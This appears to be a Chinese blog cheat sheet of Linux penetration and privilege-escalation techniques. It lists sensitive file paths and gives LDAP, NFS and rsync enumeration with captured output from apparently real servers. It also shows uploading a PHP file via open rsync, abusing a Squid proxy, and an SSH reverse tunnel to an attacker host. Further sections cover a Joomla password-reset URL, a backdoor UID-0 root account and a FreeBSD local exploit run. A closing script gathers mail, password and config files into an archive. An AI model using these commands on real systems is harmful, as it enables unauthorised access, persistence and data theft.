Linux渗透与提权:技巧总结篇

Linux 系统下的一些常见路径:


/etc/passwd    /etc/shadow    /etc/fstab    /etc/host.conf    /etc/motd    /etc/ld.so.conf    /var/www/htdocs/index.php    /var/www/conf/httpd.conf    /var/www/htdocs/index.html    /var/httpd/conf/php.ini    /var/httpd/htdocs/index.php    /var/httpd/conf/httpd.conf    /var/httpd/htdocs/index.html    /var/httpd/conf/php.ini    /var/www/index.html    /var/www/index.php    /opt/www/conf/httpd.conf    /opt/www/htdocs/index.php    /opt/www/htdocs/index.html    /usr/local/apache/htdocs/index.html    /usr/local/apache/htdocs/index.php    /usr/local/apache2/htdocs/index.html    /usr/local/apache2/htdocs/index.php    /usr/local/httpd2.2/htdocs/index.php    /usr/local/httpd2.2/htdocs/index.html    /tmp/apache/htdocs/index.html    /tmp/apache/htdocs/index.php    /etc/httpd/htdocs/index.php    /etc/httpd/conf/httpd.conf    /etc/httpd/htdocs/index.html    /www/php/php.ini    /www/php4/php.ini    /www/php5/php.ini    /www/conf/httpd.conf    /www/htdocs/index.php    /www/htdocs/index.html    /usr/local/httpd/conf/httpd.conf    /apache/apache/conf/httpd.conf    /apache/apache2/conf/httpd.conf    /etc/apache/apache.conf    /etc/apache2/apache.conf    /etc/apache/httpd.conf    /etc/apache2/httpd.conf    /etc/apache2/vhosts.d/00_default_vhost.conf    /etc/apache2/sites-available/default    /etc/phpmyadmin/config.inc.php    /etc/mysql/my.cnf    /etc/httpd/conf.d/php.conf    /etc/httpd/conf.d/httpd.conf    /etc/httpd/logs/error_log    /etc/httpd/logs/error.log    /etc/httpd/logs/access_log    /etc/httpd/logs/access.log    /home/apache/conf/httpd.conf    /home/apache2/conf/httpd.conf    /var/log/apache/error_log    /var/log/apache/error.log    /var/log/apache/access_log    /var/log/apache/access.log    /var/log/apache2/error_log    /var/log/apache2/error.log    /var/log/apache2/access_log    /var/log/apache2/access.log    /var/www/logs/error_log    /var/www/logs/error.log    /var/www/logs/access_log    /var/www/logs/access.log    /usr/local/apache/logs/error_log    /usr/local/apache/logs/error.log    /usr/local/apache/logs/access_log    /usr/local/apache/logs/access.log    /var/log/error_log    /var/log/error.log    /var/log/access_log    /var/log/access.log    /usr/local/apache/logs/access_logaccess_log.old    /usr/local/apache/logs/error_logerror_log.old    /etc/php.ini    /bin/php.ini    /etc/init.d/httpd    /etc/init.d/mysql    /etc/httpd/php.ini    /usr/lib/php.ini    /usr/lib/php/php.ini    /usr/local/etc/php.ini    /usr/local/lib/php.ini    /usr/local/php/lib/php.ini    /usr/local/php4/lib/php.ini    /usr/local/php4/php.ini    /usr/local/php4/lib/php.ini    /usr/local/php5/lib/php.ini    /usr/local/php5/etc/php.ini    /usr/local/php5/php5.ini    /usr/local/apache/conf/php.ini    /usr/local/apache/conf/httpd.conf    /usr/local/apache2/conf/httpd.conf    /usr/local/apache2/conf/php.ini    /etc/php4.4/fcgi/php.ini    /etc/php4/apache/php.ini    /etc/php4/apache2/php.ini    /etc/php5/apache/php.ini    /etc/php5/apache2/php.ini    /etc/php/php.ini    /etc/php/php4/php.ini    /etc/php/apache/php.ini    /etc/php/apache2/php.ini    /web/conf/php.ini    /usr/local/Zend/etc/php.ini    /opt/xampp/etc/php.ini    /var/local/www/conf/php.ini    /var/local/www/conf/httpd.conf    /etc/php/cgi/php.ini    /etc/php4/cgi/php.ini    /etc/php5/cgi/php.ini    /php5/php.ini    /php4/php.ini    /php/php.ini    /PHP/php.ini    /apache/php/php.ini    /xampp/apache/bin/php.ini    /xampp/apache/conf/httpd.conf    /NetServer/bin/stable/apache/php.ini    /home2/bin/stable/apache/php.ini    /home/bin/stable/apache/php.ini    /var/log/mysql/mysql-bin.log    /var/log/mysql.log    /var/log/mysqlderror.log    /var/log/mysql/mysql.log    /var/log/mysql/mysql-slow.log    /var/mysql.log    /var/lib/mysql/my.cnf    /usr/local/mysql/my.cnf    /usr/local/mysql/bin/mysql    /etc/mysql/my.cnf    /etc/my.cnf    /usr/local/cpanel/logs    /usr/local/cpanel/logs/stats_log    /usr/local/cpanel/logs/access_log    /usr/local/cpanel/logs/error_log    /usr/local/cpanel/logs/license_log    /usr/local/cpanel/logs/login_log    /usr/local/cpanel/logs/stats_log    /usr/local/share/examples/php4/php.ini    /usr/local/share/examples/php/php.ini    /usr/local/tomcat5527/bin/version.sh    /usr/share/tomcat6/bin/startup.sh    /usr/tomcat6/bin/startup.sh

 liunx 相关提权渗透技巧总结,一、ldap 渗透技巧:


1.cat /etc/nsswitch



看看密码登录策略我们可以看到使用了file ldap模式

2.less /etc/ldap.conf    base ou=People,dc=unix-center,dc=net



找到ou,dc,dc设置

3.查找管理员信息

匿名方式

ldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2



有密码形式

ldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2



4.查找10条用户记录

ldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口



实战:

1.cat /etc/nsswitch



看看密码登录策略我们可以看到使用了file ldap模式

2.less /etc/ldap.conf    base ou=People,dc=unix-center,dc=net



找到ou,dc,dc设置

3.查找管理员信息

匿名方式

ldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2



有密码形式

ldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2



4.查找10条用户记录

ldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口

渗透实战:

1.返回所有的属性

ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s sub "objectclass=*"    version: 1    dn: dc=ruc,dc=edu,dc=cn    dc: ruc    objectClass: domain    dn: uid=manager,dc=ruc,dc=edu,dc=cn    uid: manager    objectClass: inetOrgPerson    objectClass: organizationalPerson    objectClass: person    objectClass: top    sn: manager    cn: manager    dn: uid=superadmin,dc=ruc,dc=edu,dc=cn    uid: superadmin    objectClass: inetOrgPerson    objectClass: organizationalPerson    objectClass: person    objectClass: top    sn: superadmin    cn: superadmin    dn: uid=admin,dc=ruc,dc=edu,dc=cn    uid: admin    objectClass: inetOrgPerson    objectClass: organizationalPerson    objectClass: person    objectClass: top    sn: admin    cn: admin    dn: uid=dcp_anonymous,dc=ruc,dc=edu,dc=cn    uid: dcp_anonymous    objectClass: top    objectClass: person    objectClass: organizationalPerson    objectClass: inetOrgPerson    sn: dcp_anonymous    cn: dcp_anonymous


2.查看基类

bash-3.00# ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s base "objectclass=*" | more version: 1 dn: dc=ruc,dc=edu,dc=cn dc: ruc objectClass: domain



3.查找

bash-3.00# ldapsearch -h 192.168.7.33 -b "" -s base "objectclass=*"    version: 1    dn:    objectClass: top    namingContexts: dc=ruc,dc=edu,dc=cn    supportedExtension: 2.16.840.1.113730.3.5.7    supportedExtension: 2.16.840.1.113730.3.5.8    supportedExtension: 1.3.6.1.4.1.4203.1.11.1    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.25    supportedExtension: 2.16.840.1.113730.3.5.3    supportedExtension: 2.16.840.1.113730.3.5.5    supportedExtension: 2.16.840.1.113730.3.5.6    supportedExtension: 2.16.840.1.113730.3.5.4    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.1    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.2    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.3    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.4    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.5    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.6    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.7    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.8    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.9    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.23    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.11    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.12    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.13    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.14    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.15    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.16    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.17    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.18    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.19    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.21    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.22    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.24    supportedExtension: 1.3.6.1.4.1.1466.20037    supportedExtension: 1.3.6.1.4.1.4203.1.11.3    supportedControl: 2.16.840.1.113730.3.4.2    supportedControl: 2.16.840.1.113730.3.4.3    supportedControl: 2.16.840.1.113730.3.4.4    supportedControl: 2.16.840.1.113730.3.4.5    supportedControl: 1.2.840.113556.1.4.473    supportedControl: 2.16.840.1.113730.3.4.9    supportedControl: 2.16.840.1.113730.3.4.16    supportedControl: 2.16.840.1.113730.3.4.15    supportedControl: 2.16.840.1.113730.3.4.17    supportedControl: 2.16.840.1.113730.3.4.19    supportedControl: 1.3.6.1.4.1.42.2.27.9.5.2    supportedControl: 1.3.6.1.4.1.42.2.27.9.5.6    supportedControl: 1.3.6.1.4.1.42.2.27.9.5.8    supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1    supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1    supportedControl: 2.16.840.1.113730.3.4.14    supportedControl: 1.3.6.1.4.1.1466.29539.12    supportedControl: 2.16.840.1.113730.3.4.12    supportedControl: 2.16.840.1.113730.3.4.18    supportedControl: 2.16.840.1.113730.3.4.13    supportedSASLMechanisms: EXTERNAL    supportedSASLMechanisms: DIGEST-MD5    supportedLDAPVersion: 2    supportedLDAPVersion: 3    vendorName: Sun Microsystems, Inc.    vendorVersion: Sun-Java(tm)-System-Directory/6.2    dataversion: 020090516011411    netscapemdsuffix: cn=ldap://dc=webA:389    supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA    supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA    supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_256_CBC_SHA    supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_256_CBC_SHA    supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_256_CBC_SHA    supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA    supportedSSLCiphers: TLS_RSA_WITH_AES_256_CBC_SHA    supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_RC4_128_SHA    supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA    supportedSSLCiphers: TLS_ECDHE_RSA_WITH_RC4_128_SHA    supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA    supportedSSLCiphers: TLS_DHE_DSS_WITH_RC4_128_SHA    supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_128_CBC_SHA    supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_128_CBC_SHA    supportedSSLCiphers: TLS_ECDH_RSA_WITH_RC4_128_SHA    supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_128_CBC_SHA    supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_RC4_128_SHA    supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA    supportedSSLCiphers: SSL_RSA_WITH_RC4_128_MD5    supportedSSLCiphers: SSL_RSA_WITH_RC4_128_SHA    supportedSSLCiphers: TLS_RSA_WITH_AES_128_CBC_SHA    supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA    supportedSSLCiphers: TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA    supportedSSLCiphers: SSL_DHE_RSA_WITH_3DES_EDE_CBC_SHA    supportedSSLCiphers: SSL_DHE_DSS_WITH_3DES_EDE_CBC_SHA    supportedSSLCiphers: TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA    supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA    supportedSSLCiphers: SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA    supportedSSLCiphers: SSL_RSA_WITH_3DES_EDE_CBC_SHA    supportedSSLCiphers: SSL_DHE_RSA_WITH_DES_CBC_SHA    supportedSSLCiphers: SSL_DHE_DSS_WITH_DES_CBC_SHA    supportedSSLCiphers: SSL_RSA_FIPS_WITH_DES_CBC_SHA    supportedSSLCiphers: SSL_RSA_WITH_DES_CBC_SHA    supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_RC4_56_SHA    supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_DES_CBC_SHA    supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC4_40_MD5    supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC2_CBC_40_MD5    supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_NULL_SHA    supportedSSLCiphers: TLS_ECDHE_RSA_WITH_NULL_SHA    supportedSSLCiphers: TLS_ECDH_RSA_WITH_NULL_SHA    supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_NULL_SHA    supportedSSLCiphers: SSL_RSA_WITH_NULL_SHA    supportedSSLCiphers: SSL_RSA_WITH_NULL_MD5    supportedSSLCiphers: SSL_CK_RC4_128_WITH_MD5    supportedSSLCiphers: SSL_CK_RC2_128_CBC_WITH_MD5    supportedSSLCiphers: SSL_CK_DES_192_EDE3_CBC_WITH_MD5    supportedSSLCiphers: SSL_CK_DES_64_CBC_WITH_MD5    supportedSSLCiphers: SSL_CK_RC4_128_EXPORT40_WITH_MD5    supportedSSLCiphers: SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD5


 

 liunx 相关提权渗透技巧总结,二、NFS 渗透技巧:

列举IP:

showmount -e ip

 liunx 相关提权渗透技巧总结,三、rsync渗透技巧:

1.查看rsync服务器上的列表:

rsync 210.51.X.X::    finance    img_finance    auto    img_auto    html_cms    img_cms    ent_cms    ent_img    ceshi    res_img    res_img_c2    chip    chip_c2    ent_icms    games    gamesimg    media    mediaimg    fashion    res-fashion    res-fo    taobao-home    res-taobao-home    house    res-house    res-home    res-edu    res-ent    res-labs    res-news    res-phtv    res-media    home    edu    news    res-book



看相应的下级目录(注意一定要在目录后面添加上/)

rsync 210.51.X.X::htdocs_app/    rsync 210.51.X.X::auto/    rsync 210.51.X.X::edu/



2.下载rsync服务器上的配置文件

rsync -avz 210.51.X.X::htdocs_app/ /tmp/app/



3.向上更新rsync文件(成功上传,不会覆盖)

rsync -avz nothack.php 210.51.X.X::htdocs_app/warn/   http://app.finance.xxx.com/warn/nothack.txt



 liunx 相关提权渗透技巧总结,四、squid渗透技巧:

nc -vv  80    GET HTTP://www.sina.com / HTTP/1.0    GET HTTP://WWW.sina.com:22 / HTTP/1.0



 liunx 相关提权渗透技巧总结,五、SSH端口转发:

ssh -C -f -N -g -R 44:127.0.0.1:22 cnbird@ip



 liunx 相关提权渗透技巧总结,六、joomla渗透小技巧:

确定版本:

index.php?option=com_content&view=article&id=30:what-languages-are-supported-by-joomla-15&catid=32:languages&Itemid=47



重新设置密码:

index.php?option=com_user&view=reset&layout=confirm



 liunx 相关提权渗透技巧总结,七、Linux添加UID为0的root用户:

useradd -o -u 0 nothack



 liunx 相关提权渗透技巧总结,八、freebsd本地提权:

[argp@julius ~]$ uname -rsi    * freebsd 7.3-RELEASE GENERIC    * [argp@julius ~]$ sysctl vfs.usermount    * vfs.usermount: 1    * [argp@julius ~]$ id    * uid=1001(argp) gid=1001(argp) groups=1001(argp)    * [argp@julius ~]$ gcc -Wall nfs_mount_ex.c -o nfs_mount_ex    * [argp@julius ~]$ ./nfs_mount_ex    *    calling nmount()



 tar 文件夹打包:

1、tar打包:

tar -cvf /home/public_html/*.tar /home/public_html/--exclude=排除文件*.gif  排除目录 /xx/xx/*    alzip打包(韩国) alzip -a D:/WEB d:/web*.rar



{

注:

关于tar的打包方式,linux不以扩展名来决定文件类型。

若压缩的话tar -ztf *.tar.gz   查看压缩包里内容     tar -zxf *.tar.gz 解压

那么用这条比较好

tar -czf /home/public_html/*.tar.gz /home/public_html/--exclude= 排除文件*.gif   排除目录 /xx/xx/*



}

系统信息收集:

for linux:    #!/bin/bash    echo #######geting sysinfo####    echo ######usage: ./getinfo.sh >/tmp/sysinfo.txt    echo #######basic infomation##    cat /proc/meminfo    echo    cat /proc/cpuinfo    echo    rpm -qa 2>/dev/null    ######stole the mail......######    cp -a /var/mail /tmp/getmail 2>/dev/null    echo 'u'r id is' `id`    echo ###atq&crontab#####    atq    crontab -l    echo #####about var#####    set    echo #####about network###    ####this is then point in pentest,but i am a new bird,so u need to add some in it    cat /etc/hosts    hostname    ipconfig -a    arp -v    echo ########user####    cat /etc/passwd|grep -i sh    echo ######service####    chkconfig --list    for i in {oracle,mysql,tomcat,samba,apache,ftp}    cat /etc/passwd|grep -i $i    done    locate passwd >/tmp/password 2>/dev/null    sleep 5    locate password >>/tmp/password 2>/dev/null    sleep 5    locate conf >/tmp/sysconfig 2>dev/null    sleep 5    locate config >>/tmp/sysconfig 2>/dev/null    sleep 5    ###maybe can use "tree /"###    echo ##packing up#########    tar cvf getsysinfo.tar /tmp/getmail /tmp/password /tmp/sysconfig    rm -rf /tmp/getmail /tmp/password /tmp/sysconfig


你可能感兴趣的:(linux,local,技巧)